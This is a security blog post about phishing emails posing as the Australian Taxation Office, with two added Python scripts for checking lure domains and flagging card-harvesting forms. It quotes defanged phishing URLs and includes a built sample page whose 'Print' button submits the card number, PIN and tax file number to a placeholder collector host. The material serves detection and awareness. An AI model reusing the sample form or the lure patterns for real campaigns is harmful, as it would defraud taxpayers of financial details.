Phishers’ Untimely Arrival at the ATO for Tax Refunds! 

Jun 16, 2009 06:05 PM

The bad guys keep a close eye on the calendar, so a phishing campaign timed to a significant event should surprise nobody. Symantec recently observed a fresh round of phishing scams impersonating the Australian Taxation Office (ATO) as the financial year draws to a close.

The opportunistic scammers are distributing phishing emails that falsely claim to come from the ATO and offer an online tax refund. The email carries the tax office logo and urges the recipient to follow a link to a phony tax refund request page.


The scam emails carry From and Subject headers such as the following:

From:  Australian Tax Office <admin@ato.gov>
Subject: ATO Notification-Tax Refund

Note that the sender domain is ato.gov, not the ATO's actual domain, ato.gov.au. Even a correct-looking sender domain proves little on its own, since the From header is trivially forged; what it does show here is that the scammers were not even careful about it.


The text in the message body and the refund amount vary from email to email. However, all of the emails and Web pages contain text such as "A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline," intended to create a sense of urgency in the intended victim.

Some of the phishing links observed so far are listed below (the domain names of several compromised Web servers have been replaced with x's):

hxxp://www.ato.gov.au.australiantaxation.biz/australian-taxation-office/individuals/taxreturn.html
hxxp://www.xxxxx.net/ato.gov.au/individuals/index.htm?cmd=_login-run&ID=2138eskof3456ddfdfa13c0db1f1ff10d346422127f86b3&email=
hxxp://xxxxxxxxxxx.com/~glicker/tap.ato.gov.au/Tax-refund.html
hxxp://www.xxxxxxxxxxxxxxxxx.de/css/ato.gov.au/http.s.www.irs.ov%20get%20refunds%20on%20your%20visa%20or%20master%20card%20now%20refunds%20is%20about%20three%20to%20five%20business.www.irs.gove.html.html


Many of the links contain the familiar ato.gov.au string, either as leading labels of the hostname (www.ato.gov.au.australiantaxation.biz is a host under australiantaxation.biz, not under ato.gov.au) or as a directory in the path, and lead to a page that imitates the real ATO tax refund Web page. Most of these sites were still up at 10:30hrs IST, June 14, 2009. The domain australiantaxation.biz was registered recently and was hosted at the IP address 216.39.57.104 in Sunnyvale, USA; the domain is now inactive. Several of the other attacks were hosted on existing domains and were traced back to compromised Web servers in Germany.
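The following script, an added example and not code from the original Symantec post, shows how to check the lures above and the forged From header against the legitimate domain. It separates the part of a hostname that was actually registered from the decorative labels in front of it, and separately flags links that merely mention ato.gov.au somewhere in the host or path. The small suffix table standing in for the Public Suffix List, the `hxxp` defanging step, and the function names are the example's own assumptions.

```python
"""Check ATO phishing lures against the legitimate domain.

Added example, not part of the original post. Standard library only; the
suffix table below is a hand-built stand-in for the Public Suffix List,
sufficient for the hostnames quoted in the post.
"""
from email.utils import parseaddr
from urllib.parse import urlparse

LEGIT_DOMAIN = "ato.gov.au"

# Assumption: a tiny subset of the Public Suffix List. A real deployment
# would use the full list (for example via the publicsuffix2 package).
MULTI_LABEL_SUFFIXES = {"gov.au", "com.au", "net.au", "edu.au", "co.uk"}

# Lures quoted in the post (defanged with hxxp, servers masked with x's).
LURES = [
    "hxxp://www.ato.gov.au.australiantaxation.biz/australian-taxation-office/individuals/taxreturn.html",
    "hxxp://www.xxxxx.net/ato.gov.au/individuals/index.htm?cmd=_login-run&ID=2138eskof3456ddfdfa13c0db1f1ff10d346422127f86b3&email=",
    "hxxp://xxxxxxxxxxx.com/~glicker/tap.ato.gov.au/Tax-refund.html",
    "hxxp://www.xxxxxxxxxxxxxxxxx.de/css/ato.gov.au/http.s.www.irs.ov%20get%20refunds.www.irs.gove.html.html",
]


def registrable_domain(host: str) -> str:
    """Return the part of a hostname that somebody actually registered.

    'www.ato.gov.au.australiantaxation.biz' -> 'australiantaxation.biz'
    'www.ato.gov.au'                         -> 'ato.gov.au'
    """
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def link_verdict(url: str) -> dict:
    """Is the link really on ato.gov.au, or does it only mention it?"""
    # Undo the hxxp defanging used in the post before parsing.
    parsed = urlparse(url.replace("hxxp://", "http://", 1))
    host = parsed.hostname or ""
    reg = registrable_domain(host)
    mentions_brand = LEGIT_DOMAIN in (host + parsed.path).lower()
    return {
        "host": host,
        "registrable_domain": reg,
        "legit": reg == LEGIT_DOMAIN,
        # The brand's domain appears as decoration but is not the real domain.
        "decoy_brand": mentions_brand and reg != LEGIT_DOMAIN,
    }


def sender_verdict(from_header: str) -> dict:
    """Compare the address domain in a From header with the legit domain.

    The display name ('Australian Tax Office') is attacker-controlled and
    is ignored; even a matching domain is not proof without SPF/DKIM.
    """
    display_name, addr = parseaddr(from_header)
    domain = addr.rpartition("@")[2].lower()
    return {"display_name": display_name, "address": addr,
            "domain": domain, "legit": domain == LEGIT_DOMAIN}


if __name__ == "__main__":
    print(sender_verdict("Australian Tax Office <admin@ato.gov>"))
    for lure in LURES:
        v = link_verdict(lure)
        print(f"{v['registrable_domain']:<28} legit={v['legit']!s:<5} "
              f"decoy_brand={v['decoy_brand']}  {v['host']}")
```

Every one of the four lures resolves to a registrable domain other than ato.gov.au while still mentioning it, which is exactly the pattern a mail gateway or a browser-side warning should key on: the brand string is in the wrong place.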

The input fields ask for the intended victim's details, such as total taxable income and tax paid in an assessment year, before the victim is directed to a second page that asks for credit card details.


Some of the phishing links redirect potential victims to a fake tax refund form that collects details such as a Tax File Number and other personal information. At the bottom of the form, a credit card number and ATM PIN are required for the phony refund process.

Day after day, fraudsters are getting cleverer and executing their scams with new tricks and tactics. This particular fraud is technically creative and well executed. Interestingly, the page asks the intended victim to fill in the details and then print the form, which is supposedly to be posted to a mailing address so that the refund can be processed; the scammers evidently realize that people have learned to be wary of submitting details through a phishing link. In reality, when the victim completes the form and clicks the "Print" button, the credit card details are immediately sent to a server on the fraud domain.
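One way to catch the trick described above on the server or proxy side is to audit the HTML for forms that collect card or PIN fields and post them to a host other than the one serving the page, and for "Print" buttons whose click handler also submits the form. The script below is an added example, not the original post's code and not the real phishing kit; the sample page is constructed to mirror the behaviour described (the hostnames, field names and `audit_page`/`FormAudit` names are the example's assumptions).

```python
"""Flag a 'Print' button that really submits card data off-host.

Added example, not from the original post. SAMPLE_HTML is constructed to
reproduce the described behaviour; it is not the actual phishing page.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: the page is served from one host, but the form posts
# to another, and the "Print" button submits the form before printing.
SAMPLE_PAGE_HOST = "www.xxxxx.net"
SAMPLE_HTML = """
<html><body>
<form id="refund" method="post" action="http://collector.example.invalid/tap.php">
  <input name="tfn" type="text">
  <input name="cardnumber" type="text">
  <input name="atmpin" type="password">
  <input type="button" value="Print"
         onclick="document.getElementById('refund').submit(); window.print();">
</form>
</body></html>
"""

# Substrings that mark a field as sensitive (assumption; extend as needed).
SENSITIVE = ("card", "pin", "cvv", "tfn", "password")


class FormAudit(HTMLParser):
    """Record, for each <form>, where it posts and what it collects."""

    def __init__(self, page_host: str):
        super().__init__()
        self.page_host = page_host.lower()
        self.forms = []          # one dict per <form> encountered
        self._current = None     # the form currently being parsed

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            target = urlparse(a.get("action", "")).hostname
            self._current = {
                "action_host": target,
                # A relative action (no host) stays on the page's own host.
                "off_host": bool(target) and target.lower() != self.page_host,
                "sensitive_fields": [],
                "print_submits": False,
            }
            self.forms.append(self._current)
            return
        if self._current is None:
            return
        if tag in ("input", "select", "textarea"):
            name = a.get("name", "").lower()
            if any(s in name for s in SENSITIVE):
                self._current["sensitive_fields"].append(name)
        if tag in ("input", "button"):
            handler = a.get("onclick", "").lower()
            label = a.get("value", "").lower()
            # The post's trick: a button labelled "Print" that also submits.
            if "print" in label and (".submit(" in handler or a.get("type") == "submit"):
                self._current["print_submits"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_page(html: str, page_host: str) -> list:
    """Return the forms that send sensitive fields to another host."""
    parser = FormAudit(page_host)
    parser.feed(html)
    return [f for f in parser.forms if f["off_host"] and f["sensitive_fields"]]


if __name__ == "__main__":
    for finding in audit_page(SAMPLE_HTML, SAMPLE_PAGE_HOST):
        print(f"form posts {finding['sensitive_fields']} to "
              f"{finding['action_host']}; print button submits: "
              f"{finding['print_submits']}")
```

A real kit may build the request in script rather than in a form action, so this check is a first filter rather than a complete detector; the point it illustrates is that "Print" is just a label, and what the button does is decided by its handler.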


Symantec observed that these phishing attacks were not large in number. However, the schemes described above are only a few of the variations targeting Australian taxpayers.

The ATO is treating the phishing attacks seriously and advises anyone who has received a fraudulent email, or is unsure whether a communication claiming to be from the ATO is genuine, to contact it immediately. Unsolicited emails claiming to be from the ATO can be reported by forwarding the entire email to ReportEmailFraud@ato.gov.au, as advised on the ATO website (www.ato.gov.au).

So, what else can you do to protect yourself and your information? Treat any message that asks you to visit a website with caution, even if it appears to have been sent by that website. If you do click a link, double-check the actual domain shown in the browser's address bar. It is best practice to type the Web address directly into the address bar rather than rely on a link in a message.



1.    Maintain an up-to-date browser and operating system. Use security software, such as Norton Internet Security 2009. Check out Web safety services such as Norton Safe Web, where a community of Web users collaborates to report dangerous phishing and malware sites.

2.    Double-check that you have arrived at your destination. Whenever you click through to a site, make a habit of looking at what appears in the address bar. You might not always be able to spot a fake site, but in this particular scam the real domain (australiantaxation.biz, or a compromised server with ato.gov.au buried in the path) is obviously not www.ato.gov.au.

3.    Be suspicious of requests to enter your account name and password or any other confidential information.


Message Edited by Trevor Mack on 06-16-2009 03:09 PM
